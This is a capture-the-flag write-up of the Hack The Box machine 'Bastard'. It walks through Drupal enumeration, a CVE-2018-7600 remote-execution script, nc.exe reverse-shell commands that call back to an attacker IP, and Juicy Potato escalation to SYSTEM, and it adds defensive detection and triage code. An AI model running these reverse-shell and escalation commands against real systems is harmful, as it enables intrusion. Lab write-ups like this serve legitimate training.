Bastard

https://www.hackthebox.eu/home/machines/profile/7

Nmap

We can start by running nmap -p- -T4 to quickly enumerate all open ports, then run a more thorough scan against just those ports with nmap -p 80,135,49154 -A -T4.

nmap 10.10.10.9 -p- -T4

PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

nmap 10.10.10.9 -p 80,135,49154 -A -T4

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.88 seconds

HTTP

On port 80 we come to a web server hosting Drupal.

Running standard enumeration, we come across robots.txt, which has a large list of disallowed entries. I added these to a directory list and ran through them with OWASP ZAP to see which ones return an HTTP 200.

The key files here are maintainers.txt and upgrade.txt. Inspecting both of these files lets us conclude that we are most likely on Drupal 7.

If you have the Wappalyzer extension installed, you can also use it to help identify the Drupal version.

I also used Drupwn to try to identify the exact version of Drupal that is running (more enumeration never hurts). You can find the GitHub link for this in the resources section at the end of the writeup.

We can take this information and run it against searchsploit.

Just to note how important enumeration is here: running searchsploit drupal 7 returns over thirty potential results, whereas searching for the exact version, 7.54, narrows it to only eight results, as shown above.
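Added example (not part of the original writeup): the version-to-advisory triage a defender would run on their own Drupal install. It pulls the version from the header line of CHANGELOG.txt (constructed sample; the "Drupal <major>.<minor>, <date>" header format is assumed) or from the meta generator string nmap reported above, and checks it against 7.58, the Drupal 7 release that fixed CVE-2018-7600, the advisory the RCE script linked at the end of this writeup targets. The 7.58 figure is not on this page; it comes from Drupal's SA-CORE-2018-002 advisory.

```python
import re

# Constructed sample of the top of a Drupal 7 CHANGELOG.txt. The header format
# "Drupal <major>.<minor>, <date>" is assumed; the box's real file is not reproduced above.
SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- (constructed placeholder for the release notes)
"""

# Meta generator string exactly as nmap's http-generator script reported it above.
SAMPLE_GENERATOR = "Drupal 7 (http://drupal.org)"

# Minor release of Drupal 7 that fixed each advisory. Only CVE-2018-7600 is referenced
# on this page; its fix release (7.58) is taken from Drupal's SA-CORE-2018-002.
FIXED_IN = {"CVE-2018-7600": 58}

VERSION_RE = re.compile(r"\bDrupal\s+(\d+)(?:\.(\d+))?")


def extract_version(text):
    """Return (major, minor) from the first 'Drupal X[.Y]' mention; minor is None if absent."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return int(m.group(1)), (int(m.group(2)) if m.group(2) is not None else None)


def missing_fixes(version, fixed_in=FIXED_IN):
    """Advisories whose fix release is newer than the installed Drupal 7 version.

    Returns None when the version is unknown or only the major number was seen (the meta
    generator alone cannot settle the question), and an empty list for non-7.x installs
    (outside this table) or fully patched ones.
    """
    if version is None:
        return None
    major, minor = version
    if major != 7:
        return []
    if minor is None:
        return None
    return sorted(cve for cve, fix_minor in fixed_in.items() if minor < fix_minor)


def triage(text):
    """Combine extraction and comparison into one report dict."""
    version = extract_version(text)
    return {"version": version, "unpatched": missing_fixes(version)}


if __name__ == "__main__":
    print(triage(SAMPLE_CHANGELOG))   # the 7.54 install seen on this box
    print(triage(SAMPLE_GENERATOR))   # major version only: cannot decide
```

The point of the None result is the one the writeup makes about enumeration: "Drupal 7" from the generator tag is not enough to decide anything, and the exact minor version is what turns a list of thirty candidates into a yes or no.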

The script gives us remote command execution via its -c switch. Once downloaded, we can run it with the following syntax:

python3 exploit.py -c <command>  http://10.10.10.9

As shown below, we can confirm the exploit works by running whoami through it.

Let's see if we can upload netcat and get a reverse shell going. First move to a directory that contains nc.exe (Kali ships with it) and then start a Python SimpleHTTPServer as shown below:

We can now run certutil.exe on the target to download nc.exe from our attacking machine.

Once downloaded, set up a netcat listener on the attacking machine on a port of your choosing. In my examples I am using port 5555.

nc -lvp 5555

Now we can run the Python exploit again, this time calling nc.exe to connect back to our machine and spawn a shell.

python3 exploit.py -c "nc.exe -nv 10.10.14.21 5555 -e cmd.exe"  http://10.10.10.9

We now have a reverse shell into the victim machine.
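Added example (not part of the original writeup): detection logic a defender could run over process-creation telemetry to catch the chain described in this writeup, from the IIS worker spawning a shell through the certutil download, the nc.exe shell hand-off, and, for the later privilege escalation, a service account producing a child that runs as SYSTEM. The event schema and the sample events are constructed; the parent_user field is assumed to be available as in recent Sysmon versions, the parent relationship for the token-abuse stage is assumed, and the certutil download flags are deliberately elided from the sample command line.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (constructed schema, modelled on Sysmon event 1)."""
    pid: int
    image: str          # file name of the new process
    command_line: str
    user: str           # account the new process runs as
    parent_image: str
    parent_user: str    # Sysmon's ParentUser field (assumed available)


WEB_WORKERS = {"w3wp.exe"}                     # IIS worker process, as on this box
SHELLS = {"cmd.exe", "powershell.exe"}
SERVICE_ACCOUNT_PREFIXES = (
    "IIS APPPOOL\\",
    "NT AUTHORITY\\IUSR",
    "NT AUTHORITY\\NETWORK SERVICE",
    "NT AUTHORITY\\LOCAL SERVICE",
)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# "-e cmd.exe" / "-e powershell": a network tool handing its socket to a shell.
SHELL_HANDOFF_RE = re.compile(r"-e\s+(?:cmd|powershell)(?:\.exe)?\b", re.IGNORECASE)


def is_service_account(user):
    return user.upper().startswith(tuple(p.upper() for p in SERVICE_ACCOUNT_PREFIXES))


def is_system(user):
    return user.upper() == "NT AUTHORITY\\SYSTEM"


def detect(events):
    """Return (rule, pid) pairs for every event matching one of the four indicators."""
    alerts = []
    for e in events:
        image, parent = e.image.lower(), e.parent_image.lower()
        if parent in WEB_WORKERS and image in SHELLS:
            alerts.append(("web-worker-spawned-shell", e.pid))      # web app RCE stage
        if image == "certutil.exe" and URL_RE.search(e.command_line):
            alerts.append(("certutil-url-download", e.pid))        # tool transfer stage
        if SHELL_HANDOFF_RE.search(e.command_line):
            alerts.append(("reverse-shell-handoff", e.pid))        # nc.exe ... -e cmd.exe
        if is_system(e.user) and is_service_account(e.parent_user):
            alerts.append(("service-account-to-system", e.pid))    # token abuse stage
    return alerts


# Constructed sample telemetry for the chain in this writeup plus two benign events.
# The app-pool account name and the juicypotato.exe -> nc.exe parent link are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(1001, "cmd.exe", "cmd.exe /c whoami",
              "IIS APPPOOL\\DefaultAppPool", "w3wp.exe", "IIS APPPOOL\\DefaultAppPool"),
    ProcEvent(1002, "certutil.exe", "certutil.exe <download flags omitted> http://10.10.14.21/nc.exe nc.exe",
              "IIS APPPOOL\\DefaultAppPool", "cmd.exe", "IIS APPPOOL\\DefaultAppPool"),
    ProcEvent(1003, "nc.exe", "nc.exe -nv 10.10.14.21 5555 -e cmd.exe",
              "IIS APPPOOL\\DefaultAppPool", "cmd.exe", "IIS APPPOOL\\DefaultAppPool"),
    ProcEvent(1004, "nc.exe", "nc.exe -nv 10.10.14.21 3333 -e cmd.exe",
              "NT AUTHORITY\\SYSTEM", "juicypotato.exe", "IIS APPPOOL\\DefaultAppPool"),
    ProcEvent(1005, "svchost.exe", "svchost.exe -k netsvcs",
              "NT AUTHORITY\\SYSTEM", "services.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(1006, "notepad.exe", "notepad.exe notes.txt",
              "CORP\\alice", "explorer.exe", "CORP\\alice"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid}")
```

The first rule is the one with the best signal-to-noise on a box like this: an IIS worker process has no business spawning cmd.exe, so a single hit is worth an investigation even without the rest of the chain.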

User

From here we can run net user to find user accounts and then attempt to read the user flag on the desktop.

Privilege Escalation

I initially checked the systeminfo output against windows_exploit_suggester.py and found some potential avenues of escalation due to missing patches. I also checked the privileges of the account we are running as, since it is a service account.

As you can see, we have the SeImpersonatePrivilege privilege. It is usually assigned to service accounts and is usually vulnerable to Juicy Potato attacks, which as far as I am aware are generally only patched in Windows Server 2019 and Windows 10 1809 and later.

Given that we have the above privilege on a server running Windows 2008 R2, a Juicy Potato attack will probably get us privilege escalation.

Once downloaded, upload the binary to the server using certutil.exe just as we did earlier with nc.exe, except this time we can run the command from our reverse shell. With the binary on the target we can start to build the command to gain a reverse shell.

juicypotato.exe -l 1234 -p nc.exe -a " -nv 10.10.14.21 3333 -e cmd.exe" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
  • -l: create a listening port
  • -p: program to launch
  • -a: arguments to pass to the program
  • -t: CreateProcess call: CreateProcessWithTokenW, CreateProcessAsUser, or <*> to try both
  • -c: <{clsid}>: CLSID (default BITS: {4991d34b-80a1-4291-83b6-3328366b9097})

Before running the above command, set up a netcat listener on the attacking machine on the port you defined.

nc -lvp 3333

Now run the JuicyPotato.exe command and see if we catch a reverse shell. You may need to run the command a few times for it to work. If you get the output [+] CreateProcessWithTokenW OK then you know it has worked, but you will need to check your command syntax if you have not caught a shell.

As you can see, we have caught a shell as NT AUTHORITY\SYSTEM and can now grab the root.txt.txt flag on the Administrator's desktop.
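Added example (not part of the original writeup): a triage helper that applies the rule the privilege-escalation section relies on. It parses whoami /priv and systeminfo output (constructed samples, laid out the way the real commands print) and rates exposure to token-impersonation abuse: an impersonation privilege on the token combined with an OS build older than Windows 10 1809 / Windows Server 2019. The build number for those releases (17763) is an assumption stated in the code, and SeAssignPrimaryTokenPrivilege is included alongside SeImpersonatePrivilege because the Juicy Potato project linked at the end lists both as sufficient.

```python
import re

# Constructed sample of `whoami /priv` output in the layout the command prints.
SAMPLE_PRIVS = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample of the relevant `systeminfo` lines for a Windows Server 2008 R2 host.
SAMPLE_SYSINFO_2008R2 = """\
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
"""

# Same lines for a Windows Server 2019 host, to exercise the other branch.
SAMPLE_SYSINFO_2019 = """\
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
"""

PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", re.MULTILINE)
BUILD_RE = re.compile(r"^OS Version:\s*(\d+)\.(\d+)\.(\d+)", re.MULTILINE)

# Assumption: Windows 10 1809 and Windows Server 2019 are build 17763, the first
# releases the writeup treats as carrying the mitigation.
MITIGATED_BUILD = (10, 0, 17763)
IMPERSONATION_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")


def parse_privileges(text):
    """Map privilege name -> True if Enabled, False if Disabled."""
    return {m.group(1): m.group(2) == "Enabled" for m in PRIV_RE.finditer(text)}


def parse_build(text):
    """Return (major, minor, build) from the 'OS Version:' line, or None if absent."""
    m = BUILD_RE.search(text)
    return tuple(int(x) for x in m.groups()) if m else None


def token_abuse_exposure(priv_text, sysinfo_text):
    """Rate exposure to Juicy-Potato-style token abuse as (level, reason)."""
    privs = parse_privileges(priv_text)
    held = [p for p in IMPERSONATION_PRIVS if privs.get(p)]
    if not held:
        return "low", "no impersonation privilege enabled on this token"
    build = parse_build(sysinfo_text)
    if build is None:
        return "unknown", f"{', '.join(held)} enabled but OS build not found"
    if build >= MITIGATED_BUILD:
        return "reduced", f"{', '.join(held)} enabled but build {build[2]} carries the mitigation"
    return "high", f"{', '.join(held)} enabled on unmitigated build {build[2]}"


if __name__ == "__main__":
    print(token_abuse_exposure(SAMPLE_PRIVS, SAMPLE_SYSINFO_2008R2))
    print(token_abuse_exposure(SAMPLE_PRIVS, SAMPLE_SYSINFO_2019))
```

For a defender the "high" branch is the finding to act on: the fix is not to strip the privilege (IIS application pools need it) but to keep the host on a mitigated build and to keep service accounts from reaching a shell in the first place.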

Last updated 2 years ago


Notes and Resources

I tried the exploits above, both manual and Metasploit, for "Drupalgeddon" and could not get the scripts to work. At this point I looked further on Google and found an awesome RCE script by pimps: https://github.com/pimps/CVE-2018-7600

The Juicy Potato binary can be downloaded from here: https://github.com/ohpe/juicy-potato/releases

In the above example command I passed nc.exe the arguments we used earlier when gaining the initial shell, with a different port. For the -c {CLSID} option the default BITS CLSID did not work for me, so instead I defined the wuauserv service CLSID. A CLSID list for multiple Windows versions can be found here: https://github.com/ohpe/juicy-potato/tree/master/CLSID

Screenshots in the original writeup (not reproduced here): Drupal on http://10.10.10.9/; maintainers.txt; Wappalyzer extension for Firefox; Drupwn; searchsploit; testing for RCE; locating nc.exe and running a Python server; downloading nc.exe from our attacking machine; running juicypotato.exe.